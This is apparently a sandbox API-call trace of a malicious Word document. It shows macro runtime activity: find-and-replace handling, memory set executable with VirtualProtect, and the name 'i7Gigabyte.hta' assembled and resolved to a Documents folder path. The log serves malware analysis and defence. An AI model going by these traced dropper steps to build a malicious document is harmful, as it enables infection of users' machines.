[0060.473] CRetailMalloc_Alloc () returned 0x6dcc180
[0060.473] CRetailMalloc_Realloc () returned 0x6e8eff8
[0060.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3612716, cbMultiByte=5, lpWideCharStr=0x316f7c, cchWideChar=6 | out: lpWideCharStr="Find") returned 5
[0060.475] CRetailMalloc_Alloc () returned 0x6dcc420
[0060.475] CRetailMalloc_Realloc () returned 0x6ed9e08
[0060.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x361273a, cbMultiByte=8, lpWideCharStr=0x316f7c, cchWideChar=9 | out: lpWideCharStr="Execute") returned 8
[0060.476] CRetailMalloc_Alloc () returned 0x6ef4d00
[0060.476] _mbscpy_s (in: _Dst=0x6ef4d00, _DstSizeInBytes=0x9, _Src=0x361275e | out: _Dst=0x6ef4d00) returned 0x0
[0060.476] SysStringByteLen (bstr="FindText") returned 0x10
[0060.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindText", cchWideChar=8, lpMultiByteStr=0x316ea0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FindTextÄn1", lpUsedDefaultChar=0x0) returned 8
[0060.476] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FindText", cchCount1=-1, lpString2="FindText", cchCount2=-1) returned 2
[0060.477] CRetailMalloc_Free () returned 0x7160001
[0060.477] CRetailMalloc_Alloc () returned 0x6ef4d00
[0060.477] _mbscpy_s (in: _Dst=0x6ef4d00, _DstSizeInBytes=0xc, _Src=0x3612786 | out: _Dst=0x6ef4d00) returned 0x0
[0060.477] SysStringByteLen (bstr="FindText") returned 0x10
[0060.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindText", cchWideChar=8, lpMultiByteStr=0x316ea0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FindTextÄn1", lpUsedDefaultChar=0x0) returned 8
[0060.477] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FindText", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1
[0060.477] SysStringByteLen (bstr="MatchCase") returned 0x12
[0060.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchCase", cchWideChar=9, lpMultiByteStr=0x316ea0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchCasen1", lpUsedDefaultChar=0x0) returned 9
[0060.477] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchCase", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1
[0060.477] SysStringByteLen (bstr="MatchWholeWord") returned 0x1c
[0060.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchWholeWord", cchWideChar=14, lpMultiByteStr=0x316e90, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchWholeWordýÖà\x04", lpUsedDefaultChar=0x0) returned 14
[0060.477] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchWholeWord", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1
[0060.477] SysStringByteLen (bstr="MatchWildcards") returned 0x1c
[0060.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchWildcards", cchWideChar=14, lpMultiByteStr=0x316e90, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchWildcardsýÖà\x04", lpUsedDefaultChar=0x0) returned 14
[0060.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchWildcards", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1
[0060.478] SysStringByteLen (bstr="MatchSoundsLike") returned 0x1e
[0060.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchSoundsLike", cchWideChar=15, lpMultiByteStr=0x316e90, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchSoundsLikeÖà\x04", lpUsedDefaultChar=0x0) returned 15
[0060.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchSoundsLike", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1
[0060.478] SysStringByteLen (bstr="MatchAllWordForms") returned 0x22
[0060.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchAllWordForms", cchWideChar=17, lpMultiByteStr=0x316e90, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchAllWordForms\x04", lpUsedDefaultChar=0x0) returned 17
[0060.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchAllWordForms", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1
[0060.478] SysStringByteLen (bstr="Forward") returned 0xe
[0060.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Forward", cchWideChar=7, lpMultiByteStr=0x316ea0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ForwardfÄn1", lpUsedDefaultChar=0x0) returned 7
[0060.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Forward", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1
[0060.478] SysStringByteLen (bstr="Wrap") returned 0x8
[0060.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wrap", cchWideChar=4, lpMultiByteStr=0x316ea0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wrap§Ä\x97fÄn1", lpUsedDefaultChar=0x0) returned 4
[0060.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Wrap", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 3
[0060.478] SysStringByteLen (bstr="Format") returned 0xc
[0060.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Format", cchWideChar=6, lpMultiByteStr=0x316ea0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Format\x97fÄn1", lpUsedDefaultChar=0x0) returned 6
[0060.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Format", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1
[0060.478] SysStringByteLen (bstr="ReplaceWith") returned 0x16
[0060.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ReplaceWith", cchWideChar=11, lpMultiByteStr=0x316e90, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReplaceWith", lpUsedDefaultChar=0x0) returned 11
[0060.478] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ReplaceWith", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 2
[0060.479] CRetailMalloc_Free () returned 0x7160001
[0060.479] CRetailMalloc_Alloc () returned 0x6f487d8
[0060.479] _mbscpy_s (in: _Dst=0x6f487d8, _DstSizeInBytes=0x8, _Src=0x36127ae | out: _Dst=0x6f487d8) returned 0x0
[0060.479] SysStringByteLen (bstr="FindText") returned 0x10
[0060.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindText", cchWideChar=8, lpMultiByteStr=0x316ea0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FindTextÄn1", lpUsedDefaultChar=0x0) returned 8
[0060.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FindText", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1
[0060.479] SysStringByteLen (bstr="MatchCase") returned 0x12
[0060.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchCase", cchWideChar=9, lpMultiByteStr=0x316ea0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchCasen1", lpUsedDefaultChar=0x0) returned 9
[0060.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchCase", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1
[0060.479] SysStringByteLen (bstr="MatchWholeWord") returned 0x1c
[0060.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchWholeWord", cchWideChar=14, lpMultiByteStr=0x316e90, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchWholeWordýÖà\x04", lpUsedDefaultChar=0x0) returned 14
[0060.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchWholeWord", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1
[0060.479] SysStringByteLen (bstr="MatchWildcards") returned 0x1c
[0060.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchWildcards", cchWideChar=14, lpMultiByteStr=0x316e90, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchWildcardsýÖà\x04", lpUsedDefaultChar=0x0) returned 14
[0060.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchWildcards", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1
[0060.479] SysStringByteLen (bstr="MatchSoundsLike") returned 0x1e
[0060.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchSoundsLike", cchWideChar=15, lpMultiByteStr=0x316e90, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchSoundsLikeÖà\x04", lpUsedDefaultChar=0x0) returned 15
[0060.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchSoundsLike", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1
[0060.479] SysStringByteLen (bstr="MatchAllWordForms") returned 0x22
[0060.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchAllWordForms", cchWideChar=17, lpMultiByteStr=0x316e90, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchAllWordForms\x04", lpUsedDefaultChar=0x0) returned 17
[0060.479] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchAllWordForms", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1
[0060.479] SysStringByteLen (bstr="Forward") returned 0xe
[0060.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Forward", cchWideChar=7, lpMultiByteStr=0x316ea0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ForwardfÄn1", lpUsedDefaultChar=0x0) returned 7
[0060.480] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Forward", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1
[0060.480] SysStringByteLen (bstr="Wrap") returned 0x8
[0060.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wrap", cchWideChar=4, lpMultiByteStr=0x316ea0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wrap§Ä\x97fÄn1", lpUsedDefaultChar=0x0) returned 4
[0060.480] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Wrap", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 3
[0060.480] SysStringByteLen (bstr="Format") returned 0xc
[0060.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Format", cchWideChar=6, lpMultiByteStr=0x316ea0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Format\x97fÄn1", lpUsedDefaultChar=0x0) returned 6
[0060.480] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Format", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1
[0060.480] SysStringByteLen (bstr="ReplaceWith") returned 0x16
[0060.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ReplaceWith", cchWideChar=11, lpMultiByteStr=0x316e90, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReplaceWith", lpUsedDefaultChar=0x0) returned 11
[0060.480] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ReplaceWith", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 3
[0060.480] SysStringByteLen (bstr="Replace") returned 0xe
[0060.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Replace", cchWideChar=7, lpMultiByteStr=0x316ea0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReplacefÄn1", lpUsedDefaultChar=0x0) returned 7
[0060.480] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Replace", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 2
[0060.480] CRetailMalloc_Free () returned 0x8e0101
[0060.481] CRetailMalloc_Realloc () returned 0x5c2c728
[0060.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x37f27d2, cbMultiByte=14, lpWideCharStr=0x316f44, cchWideChar=15 | out: lpWideCharStr="superI7Center") returned 14
[0060.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36126ea, cbMultiByte=14, lpWideCharStr=0x316fa4, cchWideChar=15 | out: lpWideCharStr="superI7Center") returned 14
[0060.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36126ea, cbMultiByte=14, lpWideCharStr=0x316fa4, cchWideChar=15 | out: lpWideCharStr="superI7Center") returned 14
[0060.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36126ea, cbMultiByte=14, lpWideCharStr=0x316fa4, cchWideChar=15 | out: lpWideCharStr="superI7Center") returned 14
[0060.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36126ea, cbMultiByte=14, lpWideCharStr=0x316fa4, cchWideChar=15 | out: lpWideCharStr="superI7Center") returned 14
[0060.482] CRetailMalloc_Alloc () returned 0x6e0a158
[0060.482] _mbscpy_s (in: _Dst=0x6e0a158, _DstSizeInBytes=0xe, _Src=0x36126ea | out: _Dst=0x6e0a158) returned 0x0
[0060.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3612ace, cbMultiByte=21, lpWideCharStr=0x316fb4, cchWideChar=22 | out: lpWideCharStr="_B_var_superI7Center") returned 21
[0060.483] _mbscpy_s (in: _Dst=0x31701c, _DstSizeInBytes=0xe, _Src=0x36126ea | out: _Dst=0x31701c) returned 0x0
[0060.483] CRetailMalloc_Free () returned 0xcb20001
[0060.483] CRetailMalloc_Realloc () returned 0x6f51258
[0060.483] CRetailMalloc_Free () returned 0x520001
[0060.483] GetCurrentProcess () returned 0xffffffff
[0060.483] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b2c, dwSize=0x14) returned 1
[0060.483] VirtualProtect (in: lpAddress=0x6e97b2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x316e6c | out: lpflOldProtect=0x316e6c*=0x40) returned 1
[0060.484] GetCurrentProcess () returned 0xffffffff
[0060.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b2d, dwSize=0x2) returned 1
[0060.484] GetCurrentProcess () returned 0xffffffff
[0060.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b4c, dwSize=0x14) returned 1
[0060.484] VirtualProtect (in: lpAddress=0x6e97b4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x316e6c | out: lpflOldProtect=0x316e6c*=0x40) returned 1
[0060.485] GetCurrentProcess () returned 0xffffffff
[0060.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b4d, dwSize=0x2) returned 1
[0060.485] GetCurrentProcess () returned 0xffffffff
[0060.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b6c, dwSize=0x14) returned 1
[0060.485] VirtualProtect (in: lpAddress=0x6e97b6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x316e6c | out: lpflOldProtect=0x316e6c*=0x40) returned 1
[0060.485] GetCurrentProcess () returned 0xffffffff
[0060.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b6d, dwSize=0x2) returned 1
[0060.485] GetCurrentProcess () returned 0xffffffff
[0060.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b8c, dwSize=0x14) returned 1
[0060.485] VirtualProtect (in: lpAddress=0x6e97b8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x316e6c | out: lpflOldProtect=0x316e6c*=0x40) returned 1
[0060.485] GetCurrentProcess () returned 0xffffffff
[0060.486] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b8d, dwSize=0x2) returned 1
[0060.486] GetAsyncKeyState (vKey=3) returned 0
[0060.486] GetAsyncKeyState (vKey=3) returned 0
[0061.810] GetAsyncKeyState (vKey=3) returned 0
[0061.810] VarBstrCat (in: bstrLeft="i7Gigabyte.h", bstrRight="ta", pbstrResult=0x3178dc | out: pbstrResult=0x3178dc) returned 0x0
[0063.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="New", cchWideChar=4, lpMultiByteStr=0x30a940, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="New", lpUsedDefaultChar=0x0) returned 4
[0063.736] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0xd, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.736] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0x4, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0063.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Open", cchWideChar=5, lpMultiByteStr=0x30a940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Open", lpUsedDefaultChar=0x0) returned 5
[0063.736] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0xe, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.736] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0x5, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0063.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Close", cchWideChar=6, lpMultiByteStr=0x30a940, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Close", lpUsedDefaultChar=0x0) returned 6
[0063.737] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0xf, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.737] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0x6, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0063.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sync", cchWideChar=5, lpMultiByteStr=0x30a940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sync", lpUsedDefaultChar=0x0) returned 5
[0063.737] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0xe, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.737] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0x5, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0063.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XMLAfterInsert", cchWideChar=15, lpMultiByteStr=0x30a940, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XMLAfterInsert", lpUsedDefaultChar=0x0) returned 15
[0063.737] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0x18, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.737] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0xf, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0063.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XMLBeforeDelete", cchWideChar=16, lpMultiByteStr=0x30a940, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XMLBeforeDelete", lpUsedDefaultChar=0x0) returned 16
[0063.738] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0x19, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.738] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0x10, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0063.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlAfterAdd", cchWideChar=23, lpMultiByteStr=0x30a940, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlAfterAdd", lpUsedDefaultChar=0x0) returned 23
[0063.738] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0x20, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.738] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0x17, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0063.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlBeforeDelete", cchWideChar=27, lpMultiByteStr=0x30a940, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlBeforeDelete", lpUsedDefaultChar=0x0) returned 27
[0063.738] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0x24, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.738] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0x1b, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0063.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlOnExit", cchWideChar=21, lpMultiByteStr=0x30a940, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlOnExit", lpUsedDefaultChar=0x0) returned 21
[0063.738] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0x1e, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.738] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0x15, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0063.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlOnEnter", cchWideChar=22, lpMultiByteStr=0x30a940, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlOnEnter", lpUsedDefaultChar=0x0) returned 22
[0063.738] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0x1f, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.739] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0x16, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0063.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlBeforeStoreUpdate", cchWideChar=32, lpMultiByteStr=0x30a940, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlBeforeStoreUpdate", lpUsedDefaultChar=0x0) returned 32
[0063.739] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0x29, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.739] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0x20, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0063.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlBeforeContentUpdate", cchWideChar=34, lpMultiByteStr=0x30a940, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlBeforeContentUpdate", lpUsedDefaultChar=0x0) returned 34
[0063.739] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0x2b, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.739] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0x22, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0063.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuildingBlockInsert", cchWideChar=20, lpMultiByteStr=0x30a940, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuildingBlockInsert", lpUsedDefaultChar=0x0) returned 20
[0063.739] _mbscpy_s (in: _Dst=0x30a848, _DstSizeInBytes=0x1d, _Src=0x3612a4e | out: _Dst=0x30a848) returned 0x0
[0063.739] _mbscpy_s (in: _Dst=0x30a851, _DstSizeInBytes=0x14, _Src=0x30a940 | out: _Dst=0x30a851) returned 0x0
[0064.324] free (_Block=0x8e6fbe0)
[0064.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="I7Gigabyte", cchWideChar=-1, lpMultiByteStr=0x8e6ffb0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="I7Gigabyte", lpUsedDefaultChar=0x0) returned 11
[0064.325] _wfullpath (in: _Buffer=0x30a788, _Path="C:\\Users\\kEecfMwgj\\Desktop\\ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc", _BufferCount=0x104 | out: _Buffer="C:\\Users\\kEecfMwgj\\Desktop\\ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc") returned="C:\\Users\\kEecfMwgj\\Desktop\\ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc"
[0064.325] lstrcmpiW (lpString1="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta", lpString2="C:\\Users\\kEecfMwgj\\Desktop\\ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc") returned 1
[0064.325] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0064.325] wcscpy_s (in: _Destination=0x30a5a6, _SizeInWords=0x105, _Source="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta" | out: _Destination="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta") returned 0x0
[0064.325] _wcsicmp (_String1="*\\CC:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta", _String2="*\\CC:\\Users\\kEecfMwgj\\Desktop\\ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc") returned 10
[0064.325] wcscpy_s (in: _Destination=0x5bd0ca4, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0
[0064.326] CRetailMalloc_Alloc () returned 0x6e38ea0
[0064.326] CRetailMalloc_Free () returned 0x840001
[0064.327] CRetailMalloc_Alloc () returned 0x6e38ea0
[0064.327] CRetailMalloc_Free () returned 0x840001
[0064.327] CRetailMalloc_Alloc () returned 0x5b1ad00
[0064.327] CRetailMalloc_Free () returned 0x2990001
[0064.327] CRetailMalloc_Alloc () returned 0x5b1ad00
[0064.327] CRetailMalloc_Free () returned 0x2990001
[0064.328] CRetailMalloc_Alloc () returned 0x5b1ad00
[0064.328] CRetailMalloc_Free () returned 0x2990001
[0064.328] CRetailMalloc_Alloc () returned 0x5b1ad00
[0064.328] CRetailMalloc_Free () returned 0x2990001
[0064.328] CRetailMalloc_Alloc () returned 0x6e33590
[0064.328] CRetailMalloc_Free () returned 0x12e0001
[0064.328] CRetailMalloc_Alloc () returned 0x6e33590
[0064.328] CRetailMalloc_Free () returned 0x12e0001
[0064.329] CRetailMalloc_Alloc () returned 0x6e64c28
[0064.329] CRetailMalloc_Free () returned 0x1c50001
[0064.329] CRetailMalloc_Alloc () returned 0x6e64c28
[0064.329] CRetailMalloc_Free () returned 0x1c50001
[0064.329] wcscpy_s (in: _Destination=0x6e94598, _SizeInWords=0x108, _Source="*\\CC:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta" | out: _Destination="*\\CC:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta") returned 0x0
